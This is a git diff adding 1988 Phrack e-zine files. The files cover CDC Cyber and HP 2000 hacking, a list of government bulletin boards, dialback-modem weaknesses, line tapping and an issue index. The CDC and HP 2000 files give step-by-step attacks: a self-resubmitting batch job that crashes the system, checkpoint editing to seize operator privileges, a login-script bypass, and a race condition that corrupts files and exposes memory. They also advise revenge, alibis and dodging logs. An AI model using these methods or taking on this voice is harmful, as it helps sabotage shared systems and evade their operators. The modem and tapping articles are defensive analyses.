+CPU time (which is true, Submit takes almost nothing at all).  The scheduler
+"squeezes" in little jobs between all the big ones everyone loves to run, and
+gives ultra-priority to really tiny jobs.
+
+What happens is the system submits itself to death.  Sooner or later the input
+queue overflows .. there's only so much space .. and the system falls apart.
+
+This is a particularly gruesome thing to do to a system, because if the guy
+at the console (count on it) tries the usual startup, there will still be
+copies of WORM in the input queue.  First one of those gets loose, the system
+drops again.  With any luck the system will go up and down for several hours
+before someone with several connected brain cells arrives at the operator
+console and coldstarts the system.
+
+If you've got a whole room full of computer twits, all with their hair tied
+behind them with a rubber band into a ponytail, busily running their Pascal
+and "C" compiles, you're in for a good time.  One second they will all be
+printing -- the printers will be going weep-weep across the paper.  Next
+second, after you run, they will stop.  And they will stay stopped.  If you've
+done it right they can't get even get a status.  Ha, ha.
+
+The faster the CPU, the faster it will run itself into the ground.
+
+CDC claims there is a limit on the number of jobs a user number can have in
+the system.  As usual they blew it and this limit doesn't exist.  Anyway, it's
+the input queue overflow that kills things, and you can get to the input queue
+without the # of jobs validation check.
+
+Bear in mind that *anything* in that batch file is going to get repeated ten
+zillion times at the operator console as the little jobs fly by by the
+thousands.  So be sure to include some charming messages, like:
+
+job,blah
+user,blah
+* eat me!
+get,worm
+submit,worm .. etc.
+
+There will now be thousands of little "eat me!"'s scrolling across the console
+as fast as the console PPU can print them.
+
+Generally at this point the operator will have his blood pressure really
+spraying out his ears.
+
+Rest assured they will move heaven and earth to find you.  This includes past
+dayfiles, user logs, etc.  So be clean.  Remember, "Revenge is a dish best
+served cold."  If you're mad at them, and they know it, wait a year or so,
+until they are scratching their heads, wondering who hates them this much.
+
+Also:  make sure you don't take down a really important job someone else is
+doing, okay?  Like, no medical databases, and so forth.
+
+Now, for a really deft touch, submit a timed/event job.  This "blocks" the job
+for awhile, until a given time is reached.  Then, when you're far, far away,
+with a great alibi, the job restarts, the system falls apart, and you're
+clear.  If you do the timed/event rollout with a Fortran program macro call,
+it won't even show up on the log.
+
+(Remember that the System Folk will eventually realize, in their little minds,
+what you've done.  It may take them a year or two though).
+
+
+CHECKPOINT / RESTART
+
+I've saved the best for last.
+
+CDC's programmers supplied two utilities, called CheckPoint and Restart,
+primarily because their computers kept crashing before they would finish
+anything.  What Checkpoint does is make a COMPLETE copy of what you're doing -
+all local files, all of memory, etc. -- into a file, usually on a magtape.
+Then Restart "restarts" from that point.
+
+So, when you're running a 12 hour computer job, you sprinkle checkpoints
+throughout, and if the CDC drops, you can restart from your last CKP.  It's
+like a tape backup of a hard disk.  This way, you only lose the work done on
+your data between the last checkpoint and now, rather than the whole 12 hours.
+Look, this is real important on jobs that take days -- check out your local
+IRS for details..
+
+Now what's damned funny is if you look closely at the file Checkpoint
+generates, you will find a copy of your user validations, which tell
+everything about you to the system, along with the user files, memory, etc.
+You'll have to do a little digging in hex to find the numbers, but they'll
+match up nicely with the display you of your user validations from that batch
+command.
+
+Now, let's say you CKP,that makes the CKP file.  Then run a little FORTRAN
+program to edit the validations that are inside that CKP-generated file.  Then
+you RESTART from it.  Congratulations.  You're a self made man.  You can do
+whatever you want to do - set your priority level to top, grab the line
+printer as your personal printer, kick other jobs off the system (it's more
+subtle to set their priority to zilch so they never execute), etc. etc.
+You're the operator.
+
+This is really the time to be a CDC whiz and know all sorts of dark, devious
+things to do.  I'd have a list of user numbers handy that have files you'd
+like made public access, so you can go in and superzap them (then peruse them
+later from other signons), and so forth.
+
+There's some gotchas in here.. for instance, CKP must be run as part of a
+batch file out of Telex.  But you can work around them now that you know the
+people at CDC made RESTART alter your user validations.
+
+It makes sense in a way.  If you're trying to restart a job you need the same
+priority, memory, and access you had when trying to run it before.
+
+Conclusion
+
+
+There you have it, the secrets of hacking the Cyber.
+
+They've come out of several years at a college with one CDC machine, which I
+will identify as being somewhere East.  They worked when I left; while CDC may
+have patched some of them, I doubt it.  They're not real fast on updates to
+their operating system.
+
+
+** Grey Sorcerer
diff --git a/phrack17/6.txt b/phrack17/6.txt
new file mode 100644
index 0000000..abedd7e
--- /dev/null
+++ b/phrack17/6.txt
@@ -0,0 +1,94 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+                     File 6 of 12 : How to Hack HP2000's
+
+
+
+How to Hack an HP 2000
+
+By: ** Grey Sorcerer
+
+Okay, so you've read the HP-2000 basic guides, and know your way around.  I
+will not repeat all that.
+
+There's two or three things I've found that allow you through HP 2000
+security.
+
+1. When you log in, a file called HELLO on the user number Z999 is run.  A lot
+of time this file is used to deny you access.  Want in?  Well, it's just a
+BASIC program, and an be BREAKed.. but, usually the first thing they do in
+that program is turn Breaks (interrupts) off by the BRK(0) function.  However,
+if you log in like this:
+
+HELLO-D345,PASS (return) (break)
+
+With the break nearly instantly after the return, a lot of time, you'll abort
+the HELLO program, and be home free.
+
+2. If you can create a "bad file", which takes some doing, then anytime you
+try to CSAVE this file (compile and save), the system will quickly fade into a
+hard crash.
+
+3. How to make a bad file and other goodies:
+
+The most deadly hole in security in the HP2000 is the "two terminal" method.
+You've got to understand buffers to see how it works.  When you OPEN a file,
+or ASSIGN it (same thing), you get 256 bytes of the file -- the first 256.
+When you need anymore, you get 256 more.  They are brought in off the disk in
+discrete chunks.  They are stored in "buffers."
+
+So.  Save a bunch of junk to disk -- programs, data, whatever.  Then once your
+user number is full, delete all of it.  The effect is to leave the raw jumbled
+data on disk.
+
+
+Pick a time when the system is REAL busy, then:
+
+1. Have terminal #1 running a program that looks for a file to exist (with the
+ASSIGN) statement as quickly as it can loop.  If it finds the file there, it
+goes to the very end of the file, and starts reading backwards, record by
+record, looking for data.  If it finds data, it lets you know, and stops at an
+input prompt.  It is now running.
+
+2. Have terminal #2 create a really huge data file (OPEN-FILE, 3000) or
+however it goes.
+
+What happens is terminal #2's command starts zeroing all the sectors of the
+file, starting at file start.  But it only gets so far before someone else
+needs the processor, and kicks #2 out.  The zeroing stops for a sec.  Terminal
+#1 gets in, finds the file there, and reads to the end.  What's there?  Old
+trash on disk.  (Which can be mighty damned interesting by the way -- did you
+know HP uses a discrete mark to indicate end-of-buffer?  You've just maybe got
+yourself a buffer that is as deep as system memory, and if you're clever, you
+can peek or poke anywhere in memory.  If so, keep it, it is pure gold).
+
+But.  Back to the action.
+
+3. Terminal #2 completes the OPEN.  He now deletes the file.  This leaves
+Terminal #1 with a buffer full of data waiting to be dumped back to disk at
+that file's old disk location.
+
+4. Terminal #2 now saves a load of program files, as many as are required to
+fill up the area that was taken up by the deleted big file.
+
+5. You let Terminal #1 past the input prompt, and it writes its buffer to
+disk.  This promptly overlays some program just stored there.  Result:  "bad
+program."  HPs are designed with a syntax checker and store programs in token;
+a "bad program" is one that the tokens are screwed up in.  Since HP assumes
+that if a program is THERE, it passed the syntax check, it must be okay...
+it's in for big problems.  For a quick thrill, just CSAVE it..  system tries
+to semi-compile bad code, and drops.
+
+Really, the classier thing to do with this is to use the "bottomless buffer"
+to look through your system and change what you don't like.. maybe the
+password to A000?  Write some HP code, look around memory, have a good time.
+It can be done.
+
+** Grey Sorcerer
diff --git a/phrack17/7.txt b/phrack17/7.txt
new file mode 100644
index 0000000..3b21a0b
--- /dev/null
+++ b/phrack17/7.txt
@@ -0,0 +1,210 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+                File 7 of 12 : Accessing Government Computers
+
+
+                    +++++++++++++++++++++++++++++++++++++++
+                    +   ACCESSING GOVERNMENT COMPUTERS    +
+                    +             (LEGALLY!)              +
+                    +-------------------------------------+
+                    +      Written by The Sorceress       +
+                    +    (The Far Side 415/471-1138)      +
+                    +++++++++++++++++++++++++++++++++++++++
+
+
+ Comment:  I came across this article in Computer Shopper (Sept. 1987)  and it
+   talked about citizens access government computers since we do pay  for them
+   with our  taxpayers monies.  Since then, I have had  friends and gone  on a
+   few myself  and the  databases are full of  information for accessing.  One
+   thing, you usually have to call the sysop for access and give him your real
+   name, address  and the like.  They call you back and verify your existence.
+   Just a word of  warning; crashing a BBS is a crime, so I wouldn't fool with
+   these since they are government based.
+
+ -----------------------------------------------------------------------------
+ National Bureau of Standards -
+ Microcomputers Electronic Information Exchange.
+
+ Sysops: Ted Landberg & Lisa Carnahan
+  Voice: 301-975-3359
+   Data: 301-948-5717  300/1200/2400
+
+ This BBS is  operated by the  Institute for Computer  Sciences and Technology
+   which is one of four technical organizations within the National Bureau  of
+   Standards.  This  board  also  contains  information  on  the  acquisition,
+   management, security, and use of micro computers.
+ -----------------------------------------------------------------------------
+ Census Bureau -
+ Census Microcomputer and Office Technology Center, Room 1065 FB-3 Washington,
+   D.C. (Suitland, MD)
+
+ Sysop: Nevins Frankel
+ Voice: 301-763-4494
+  Data: 301-763-4576  300/1200
+
+ The purpose of  this BBS is  to allow users  to access the  following: Census
+   Microcomputer  and  office  technology  information  center  bulletins  and
+   catalogues,  software  and  hardware  evaluations,  Hardware  and  software
+   inventories, Census computer club library, Public Domain software, etc.
+ -----------------------------------------------------------------------------
+ Census Bureau -
+ Census  Microcomputer  and  Office  Technology  Center,  Personnel  Division,
+   Washington DC.
+
+ Voice: 301-763-4494
+  Data: 301-763-4574  300/1200/2400
+
+ The purpose of this  board is to display  Census Bureau vacancies from  entry
+   level to senior management.
+ -----------------------------------------------------------------------------
+ Department of Commerce -
+
+ Office  of  the  Under  Secretary  for  Economic  Affairs, Office of Business
+   Analysis, Economic Bulletin Board.
+
+ Sysop: Ken Rogers
+ Voice: 202-377-0433
+  Data: 202-377-3870  300/1200
+
+ This is  another well  run BBS  with in-depth  news about  the Department  of
+   Commerce Economic  Affairs Agencies  including current  press releases  and
+   report summaries.
+ -----------------------------------------------------------------------------
+ COE BBS -
+ Manpower  and  Force  Management  Division,  Headquarters, U.S. Army Corps of
+   Engineers, 20 Massachusetts Ave. NW, Washington, DC.
+
+ Sysop: Rich Courney
+ Voice: 202-272-1646
+  Data: 202-272-1514  300/1200/2400
+
+ The files database was  one of the largest  they ever seen. Directory  70 has
+   programs for designing masonry and retaining walls using Lotus's Symphony.
+
+ -----------------------------------------------------------------------------
+ General Services Administration -
+ Information Resources Service Center.
+
+ Data: 202-535-8054  300 bps
+ Data: 202-535-7661  1200 bps
+
+ GSA's Information Resources Service Center provides information on contracts,
+   schedules, policies, and programs. One of the areas that is interesting was
+   the weekly supplement to the  consolidated list of debarred, suspended  and
+   ineligible contractors.
+ -----------------------------------------------------------------------------
+ Budget and Finance Board of the Office of Immigration Naturalization Service.
+
+                   DO NOT CALL THIS BBS DURING WORKING HOURS.
+
+ Sysop: Mike Arnold
+  Data: 202-787-3460  300/1200/2400
+
+ The system is devoted  to the exchange of  information related to budget  and
+   financial  management in the  federal government.  It is a 'working' system
+   for the Immigration and Naturalization Service personnel.
+ -----------------------------------------------------------------------------
+ Naval Aviation News Computer Information (NANei) -
+ Supported by:  Naval Aviation  News Magazine,  Bldg. 159E,  Navy Yard  Annex,
+   Washington, DC 20374.
+
+ Sysop: Commander Howard Wheeler
+ Voice: 202-475-4407
+  Data: 202-475-1973   300/1200
+
+ Available from 5 pm to 8 am. weekdays 5pm Friday to 8 am Monday
+
+ This is a large BBS with lots of Navy related information and programs. NANci
+   is  for  those  interested  in  stories,  facts, and historical information
+   related to Naval Aviation.
+ -----------------------------------------------------------------------------
+ Federal National Mortgage Association -
+
+ Sysop: Ken Goosens
+  Data: 202-537-7475
+        202-537-7945   300/1200
+
+ This  BBS  is  in  transition.  Ken  Gossens  will  be  running  a new BBS at
+   703-979-6360. The BBS maybe become a closed board under the new sysop. This
+   BBS has/had one of largest collections of files for downloading.
+ -----------------------------------------------------------------------------
+ The World  Bank, Information,  Technology and  Facilities Department,  Office
+   System Division, Washington DC.
+
+ Sysop: Ashok Daswani
+ Voice: 202-473-2237
+  Data: 202-676-0920    300/1200
+
+ Basically a software exchange BBS, but has other information about the use of
+   microcomputers  and   software  supported  by  World   Bank.  IBM   product
+   announcements also kept up to date.
+ -----------------------------------------------------------------------------
+ National Oceanic Atmospheric  Administration (NOAA), National  Meteorological
+   Center.
+
+       * You must obtain a password from the SYSOP to log on to this BBS.
+
+ Sysop: Vernon Patterson
+ Voice: 301-763-8071
+  Data: 301-899-0825     300 bps
+        301-899-0830    1200 bps
+
+ This is one of the most  useful databases available on-line. With it  you can
+   access meteorological  data collected  form 6000  locations throughout  the
+   world.  It  can  also  display  crude,  but  useful  graphic maps of the US
+   illustration temperatures, precipitation and forecasts.
+ -----------------------------------------------------------------------------
+ National Weather Service, US Dept. of Commerce, East Coast Marine Users BBS
+
+           * You must obtain a p/w from the SYSOP to logon this BBS.
+
+ Sysop: Ross Laporte
+ Voice: 301-899-3296
+  Data: 301-454-8700  300bps
+
+ Use this  BBS to  obtain info  about marine  weather and  nautical info about
+   coastal waterways including topical storm advisories.
+ -----------------------------------------------------------------------------
+ NARDAC, Navy Regional Data Automation Center, Norfolk, VA. 23511-6497
+
+ Sysop: Jerry Dew
+ Voice: 804-445-4298
+  Data: 804-445-1627  300 & 1200 bps
+
+ A basic Utilitarian  system developed to  support the informational  needs of
+   NARDAC. The Dept. of Defense mag., CHIPS is available in the files  section
+   of this BBS. There are also Navy and IBM related articles to read.
+ -----------------------------------------------------------------------------
+ Veterans Administration, Info Technology Bulletin Board.
+
+ Data: 202-376-2184   300/1200 bps
+
+ The  content  of  this  BBS  ranges  from job opening listings to information
+   computer security.
+ -----------------------------------------------------------------------------
+ Dept. of Energy, Office of Civilian Radioactive Waste Management, Infolink.
+
+ Sysop: Bruce Birnbaum
+ Voice: 202-586-9707
+  Data: 202-586-9359   300/1200 bps
+
+ This  BBS  has  press  leases,  fact  sheets,   backgrounders,  congressional
+   questions,  answers,  speeches &  testimony,  from  the  Office of Civilian
+   Radioactive Waste Management.
+ -----------------------------------------------------------------------------
+
+ I skipped listing a few of the BBSes in this article if the chances were slim
+   to get  on or  if the BBS got a bad review.  Most of the ones listed seemed
+   to have  lot of  informative files  for downloading  and viewing  pleasure.
+   This article carried a very strong word of warning about tampering/crashing
+   these since they are run by the govt. and a volunteer Sysop.  Since you can
+   get on these legally why not use it?
+
+                                                                 The Sorceress
diff --git a/phrack17/8.txt b/phrack17/8.txt
new file mode 100644
index 0000000..5e5544d
--- /dev/null
+++ b/phrack17/8.txt
@@ -0,0 +1,212 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+                    File 8 of 12 : Dialback Modem Security
+
+
+
+In article <906@hoptoad.uucp> gnu@hoptoad.UUCP writes:
+>Here are the two messages I have archived on the subject...
+
+>[I believe the definitive article in that discussion was by Lauren Weinstein,
+>vortex!lauren; perhaps he has a copy.
+
+        What follows is the original article that started the discussion.  I
+do not know whether it qualifies as the "definitive article" as I think I
+remember Lauren and I both posted further comments.
+                                                            - Dave
+
+                            ** ARTICLE FOLLOWS **
+
+------------------------------------------------------------------------------
+
+        An increasingly popular technique for protecting dial-in ports from
+the ravages of hackers and other more sinister system penetrators is dial back
+operation wherein a legitimate user initiates a call to the system he desires
+to connect with, types in his user ID and perhaps a password, disconnects and
+waits for the system to call him back at a prearranged number. It is assumed
+that a penetrator will not be able to specify the dial back number (which is
+carefully protected), and so even if he is able to guess a user-name/password
+pair he cannot penetrate the system because he cannot do anything meaningful
+except type in a user-name and password when he is connected to the system. If
+he has a correct pair it is assumed the worst that could happen is a spurious
+call to some legitimate user which will do no harm and might even result in a
+security investigation.
+
+        Many installations depend on dial-back operation of modems for their
+principle protection against penetration via their dial up ports on the
+incorrect presumption that there is no way a penetrator could get connected to
+the modem on the call back call unless he was able to tap directly into the
+line being called back.  Alas, this assumption is not always true -
+compromises in the design of modems and the telephone network unfortunately
+make it all too possible for a clever penetrator to get connected to the call
+back call and fool the modem into thinking that it had in fact dialed the
+legitimate user.
+
+        The problem areas are as follows:
+
+                        Caller control central offices
+
+        Many older telephone central office switches implement caller control
+in which the release of the connection from a calling telephone to a called
+telephone is exclusively controlled by the originating telephone.  This means
+that if the penetrator simply failed to hang up a call to a modem on such a
+central office after he typed the legitimate user's user-name and password,
+the modem would be unable to hang up the connection.
+
+        Almost all modems would simply go on-hook in this situation and not
+notice that the connection had not been broken.  If the same line was used to
+dial out on as the call came in on,  when the modem went to dial out to call
+the legitimate user back the it might not notice (there is no standard way of
+doing so electrically) that the penetrator was still connected on the line.
+This means that the modem might attempt to dial and then wait for an
+answerback tone from the far end modem. If the penetrator was kind enough to
+supply the answerback tone from his modem after he heard the system modem
+dial, he could make a connection and penetrate the system. Of course some
+modems incorporate dial tone detectors and ringback detectors and in fact wait
+for dial tone before dialing, and ringback after dialing but fooling those
+with a recording of dial tone (or a dial tone generator chip) should pose
+little problem.
+
+
+                     Trying to call out on a ringing line
+
+        Some modems are dumb enough to pick up a ringing line and attempt to
+make a call out on it.   This fact could be used by a system penetrator to
+break dial back security even on joint control or called party control central
+offices.  A penetrator would merely have to dial in on the dial-out line
+(which would work even if it was a separate line as long as the penetrator was
+able to obtain it's number), just as the modem was about to dial out.  The
+same technique of waiting for dialing to complete and then supplying
+answerback tone could be used - and of course the same technique of supplying
+dial tone to a modem which waited for it would work here too.
+
+        Calling the dial-out line would work especially well in cases where
+the software controlling the modem either disabled auto-answer during the
+period between dial-in and dial-back (and thus allowed the line to ring with
+no action being taken) or allowed the modem to answer the line (auto-answer
+enabled) and paid no attention to whether the line was already connected when
+it tried to dial out on it.
+
+
+                               The ring window
+
+        However, even carefully written software can be fooled by the ring
+window problem.  Many central offices actually will connect an incoming call
+to a line if the line goes off hook just as the call comes in without first
+having put the 20 hz. ringing voltage on the line to make it ring.  The ring
+voltage in many telephone central offices is supplied asynchronously every 6
+seconds to every line on which there is an incoming call that has not been
+answered, so if an incoming call reaches a line just an instant after the end
+of the ring period and the line clairvoyantly responds by going off hook it
+may never see any ring voltage.
+
+        This means that a modem that picks up the line to dial out just as our
+penetrator dials in may not see any ring voltage and may therefore have no way
+of knowing that it is connected to an incoming call rather than the call
+originating circuitry of the switch.  And even if the switch always rings
+before connecting an incoming call, most modems have a window just as they are
+going off hook to originate a call when they will ignore transients (such as
+ringing voltage) on the assumption that they originate from the going-off-hook
+process. [The author is aware that some central offices reverse battery (the
+polarity of the voltage on the line) in the answer condition to distinguish it
+from the originate condition, but as this is by no means universal few if any
+modems take advantage of the information supplied]
+
+
+                                  In Summary
+
+        It is thus impossible to say with any certainty that when a modem goes
+off hook and tries to dial out on a line which can accept incoming calls it
+really is connected to the switch and actually making an outgoing call. And
+because it is relatively easy for a system penetrator to fool the tone
+detecting circuitry in a modem into believing that it is seeing dial tone,
+ringback and so forth until he supplies answerback tone and connects and
+penetrates system security should not depend on this sort of dial-back.
+
+
+                             Some Recommendations
+
+        Dial back using the same line used to dial in is not very secure and
+cannot be made completely secure with conventional modems.  Use of dithered
+(random) time delays between dial in and dial back combined with allowing the
+modem to answer during the wait period (with provisions made for recognizing
+the fact that this wasn't the originated call - perhaps by checking to see if
+the modem is in originate or answer mode) will substantially reduce this
+window of vulnerability but nothing can completely eliminate it.
+
+        Obviously if one happens to be connected to an older caller control
+switch, using the same line for dial in and dial out isn't secure at all.  It
+is easy to experimentally determine this, so it ought to be possible to avoid
+such situations.
+
+        Dial back using a separate line (or line and modem) for dialing out is
+much better, provided that either the dial out line is sterile (not readily
+traceable by a penetrator to the target system) or that it is a one way line
+that cannot accept incoming calls at all.  Unfortunately the later technique
+is far superior to the former in most organizations as concealing the
+telephone number of dial out lines for long periods involves considerable
+risk.  The author has not tried to order a dial out only telephone line, so he
+is unaware of what special charges might be made for this service or even if
+it is available.
+
+                           A final word of warning
+
+        In years past it was possible to access telephone company test and
+verification trunks in some areas of the country by using mf tones from so
+called "blue boxes". These test trunks connect to special ports on telephone
+switches that allow a test connection to be made to a line that doesn't
+disconnect when the line hangs up.   These test connections could be used to
+fool a dial out modem, even one on a dial out only line (since the telephone
+company needs a way to test it, they usually supply test connections to it
+even if the customer can't receive calls).
+
+        Access to verification and test ports and trunks has been tightened
+(they are a kind of dial-a-wiretap so it ought to be pretty difficult) but in
+any as in any system there is always the danger that someone, through
+stupidity or ignorance if not mendacity will allow a system penetrator access
+to one.
+
+                       **  Some more recent comments **
+
+        Since posting this I have had several people suggest use of PBX lines
+that can dial out but not be dialed into or outward WATS lines that also
+cannot be dialed.  Several people have also suggested use of call forwarding
+to forward incoming calls on the dial out line to the security office. [This
+may not work too well in areas served by certain ESS's which ring the number
+from which calls are being forwarded once anyway in case someone forgot to
+cancel forwarding. Forwarding is also subject to being cancelled at random
+times by central office software reboots]
+
+        And since posting this I actually tried making some measurements of
+how wide the incoming call window is for the modems we use for dial in at
+CRDS.  It appears to be at least 2-3 seconds for US Robotics Courier 2400 baud
+modems.  I found I could defeat same-line-for-dial-out dialback quite handily
+in a few dozen tries no matter what tricks I played with timing and watching
+modem status in the dial back login software. I eventually concluded that
+short of reprogramming the micro in the modem to be smarter about monitoring
+line state, there was little I could do at the login (getty) level to provide
+much security for same line dialback.
+
+        Since it usually took a few tries to break in, it is possible to
+provide some slight security improvement by sharply limiting the number of
+unsuccessful callbacks per user per day so that a hacker with only a couple of
+passwords would have to try over a significant period of time.
+
+        Note that dialback on a dedicated dial-out only line is somewhat
+secure.
+
+
+         David I. Emery    Charles River Data Systems   617-626-1102
+         983 Concord St., Framingham, MA 01701.
+         uucp: decvax!frog!die
+
+--
+          David I. Emery   Charles River Data Systems
+983 Concord St., Framingham, MA 01701 (617) 626-1102 uucp: decvax!frog!die
diff --git a/phrack17/9.txt b/phrack17/9.txt
new file mode 100644
index 0000000..d3919c1
--- /dev/null
+++ b/phrack17/9.txt
@@ -0,0 +1,79 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+                    File 9 of 12 : Data-Tapping Made Easy
+
+
+--FEATURE ARTICLES AND REVIEWS-
+
+
+ TAPPING COMPUTER DATA IS EASY, AND CLEARER THAN PHONE CALLS !
+
+    BY RIC BLACKMON, SYSOP OF A FED BBS
+
+        Aquired by Elric of Imrryr & Lunatic Labs UnLtd
+
+Note from Elric:  This file was written by the sysop of a board for computer
+security people (run on a CoCo), as far as I know the board no longer exists,
+it was being crashed by hackers too much... (hehe).
+---------------------
+
+        FOR SEVERAL YEARS, I ACCEPTED CERTAIN BITS OF MISINFORMATION AS
+TECHNICALLY ACCURATE, AND DIDN'T PROPERLY PURSUE THE MATTER.  SEVERAL FOOLS
+GAVE ME FOOLISH INFORMATION, SUCH AS: A TAP INTERRUPTS COMPUTER DATA
+TRANSMISSIONS; DATA COULD BE PICKED UP AS RF EMANATIONS BUT IT WAS A MASS OF
+UNINTELLIGIBLE SIGNAL CAUSED BY DATA MOVING BETWEEN REGISTERS; ONE HAD TO BE
+IN 'SYNC' WITH ANY SENDING COMPUTER; DATA COULDN'T BE READ UNLESS YOU HAD A
+DIRECT MATCH IN SPEED, PARITY & BIT PATTERN; AND ONLY A COMPUTER OF THE SAME
+MAKE AND MODEL COULD READ THE SENDING COMPUTER.  THIS IS ALL PLAIN SWILL.  IT
+IS IN FACT, AN EASIER CHORE TO TAP A COMPUTER THAN A TELEPHONE.  THE TECHNIQUE
+AND THE EQUIPMENT IS ALMOST THE SAME, BUT THE COMPUTER LINE WILL BE MORE
+ACCURATE (THE TWO COMPUTERS INVOLVED, HAVE ERROR CORRECTING PROCEDURES) AND
+CLEARER (DIGITAL TRANSMISSIONS HAVE MORE DISTINCT SIGNALS THAN ANALOG
+TRANSMISSIONS).
+
+FIRST, RECOGNIZE THAT NEARLY ALL DATA TRANSMISSIONS ARE SENT IN CLEARTEXT
+ASCII SIGNALS.  THE LINES CARRYING OTHER BIT-GROUPS OR ENCIPHERED TEXTS ARE
+RARE.  SECOND, THE SIGNAL APPEARS ON GREEN AND RED (WIRES) OF THE PHONE LINE
+('TIP' AND 'RING').  THE DATA IS MOST LIKELY ASYNCHRONOUS SERIAL DATA MOVING
+AT 300 BAUD.  NOW THAT 1200 BAUD IS BECOMING MORE CHIC, YOU CAN EXPECT TO FIND
+A GROWING USE OF THE FASTER TRANSMISSION RATE.  FINALLY, YOU DON'T NEED TO
+WORRY ABOUT THE PROTOCOL OR EVEN THE BAUD RATE (SPEED) UNTIL AFTER A TAPED
+COPY OF A TRANSMISSION IS OBTAINED.
+
+        IN A SIMPLE EXPERIMENT, A TAPED COPY OF A DATA TRANSMISSION WAS MADE
+WITH THE CHEAPEST OF TAPE RECORDERS, TAPPING THE GREEN AND RED LINES BEYOND
+THE MODEM.  THE RECORDING WAS THEN PLAYED INTO A MODEM AS THOUGH IT WERE AN
+ORIGINAL TRANSMISSION. AT THAT POINT, HAD IT BEEN NECESSARY, THE PROTOCOL
+SETTINGS ON RECEIVING TERMINAL COULD HAVE BEEN CHANGED TO MATCH THE TAPE.  NO
+ADJUSTMENTS WERE NECESSARY AND A NICE, CLEAR ERROR-FREE DOCUMENT WAS RECEIVED
+ON THE ILLICIT VIDEO SCREEN AND A NEAT HARD-COPY OF THE DOCUMENT CAME OFF THE
+PRINTER.  THE MESSAGE WAS INDEED CAPTURED, BUT HAD IT BEEN AN INTERCEPTION
+INSTEAD OF A SIMPLE MONITORING, IT COULD HAVE BEEN ALTERED WITH A SIMPLE WORD
+PROCESSOR PROGRAM, TO SUIT ANY PURPOSE, AND PLACED BACK ON THE WIRE.
+
+        WERE I TO HAVE AN INTEREST IN INFORMATION ORIGINATING FROM A
+PARTICULAR COMPANY, AGENCY, OR OFFICE, I THINK THAT I WOULD FIND IT FAR MORE
+PRODUCTIVE TO TAP A DATA TRANSMISSION THAN TO TAP A VOICE TRANSMISSION, AND
+EVEN MORE REWARDING THAN GETTING HARDCOPY DOCUMENTS.
+
+        *SIGNIFICANT & IMPORTANT INFORMATION IS MORE CONCENTRATED IN  A DATA
+         TRANSMISSION.
+        *SIGNIFICANT & IMPORTANT INFORMATION IS MORE EASILY LOCATED IN DATA
+         TRANSMISSIONS THAN IN MASSES OF FILES OR PHONE CALLS.
+        *TRANSMITTED DATA IS PRESUMED TRUE, AND WHEN ALTERATION IS DISCOVERED,
+         IT'S READILY BLAMED ON THE EQUIPMENT.
+        *THE LAWS CONCERNING TAPS ON UNCLASSIFIED AND NON-FINANCIAL COMPUTER
+         DATA ARE EITHER QUITE LACKING OR ABJECTLY STUPID.
+
+THE POINT OF ALL THIS IS THAT THE PRUDENT MANAGER REALLY OUGHT TO ENCRYPT ALL
+DATA TRANSMISSIONS.  ENCRYPTION PACKAGES ARE CHEAP (A 'DES' PROGRAM IS NOW
+PRICED AT $30) AND ARE EASY TO USE.
+
+-------------------------------
diff --git a/phrack18/1.txt b/phrack18/1.txt
new file mode 100644
index 0000000..d274c12
--- /dev/null
+++ b/phrack18/1.txt
@@ -0,0 +1,36 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #1 of 11
+
+                                    Index
+                                    =====
+                                June 7, 1988
+
+    Well, Phrack Inc. is still alive but have changed editors again. I,
+Crimson Death am now the new editor of Phrack Inc.  The reason why I am the
+new editor is because of the previous editors in school and they did not just
+have the time for it.  So, if you would like to submit an article for Phrack
+Inc. please contact:  Crimson Death, Control C, or Epsilon, or call my BBS
+(The Forgotten Realm) or one of the BBSes on the sponsor BBS listing (Found in
+PWN Part 1).  We are ALWAYS looking for more files to put in upcoming issues.
+Well, that about does it for me.  I hope you enjoy Phrack 18 as much as we at
+The Forgotten Realm did bringing it to you.  Later...
+                                                  Crimson Death
+                                           Sysop of The Forgotten Realm
+
+------------------------------------------------------------------------------
+
+This issue of Phrack Inc. includes the following:
+
+#1  Index of Phrack 18 by Crimson Death                      (02k)
+#2  Pro-Phile XI on Ax Murderer by Crimson Death             (04k)
+#3  An Introduction to Packet Switched Networks by Epsilon   (12k)
+#4  Primos: Primenet, RJE, DPTX by Magic Hasan               (15k)
+#5  Hacking CDC's Cyber by Phrozen Ghost                     (12k)
+#6  Unix for the Moderate by Urvile                          (11k)
+#7  Unix System Security Issues by Jester Sluggo             (27k)
+#8  Loop Maintenance Operating System by Control C           (32k)
+#9  A Few Things About Networks by Prime Suspect             (21k)
+#10 Phrack World News XVIII Part I by Epsilon                (09k)
+#11 Phrack World News XVIII Part II by Epsilon               (05k)
+==============================================================================
diff --git a/phrack18/10.txt b/phrack18/10.txt
new file mode 100644
index 0000000..610c247
--- /dev/null
+++ b/phrack18/10.txt
@@ -0,0 +1,194 @@
+                               ==Phrack Inc.==
+
+                    Volume Two, Issue 18, Phile #10 of 11
+
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+             PWN                                             PWN
+             PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
+             PWN                Issue XVIII/1                PWN
+             PWN                                             PWN
+             PWN       Created, Compiled, and Written        PWN
+             PWN                 By: Epsilon                 PWN
+             PWN                                             PWN
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Intro
+=====
+
+Welcome to yet another issue of Phrack World News.  We have once again
+returned to try and bring you an entertaining, and informative newsletter
+dedicated to the spread of information and knowledge throughout the H/P
+community.
+______________________________________________________________________________
+
+TOK Re-Formed
+=============
+
+A group called Tribunal Of Knowledge, which has undergone previous
+re-formations has once again re-formed.  The person who is currently "in
+charge" of the group says that he had permission from High Evolutionary, the
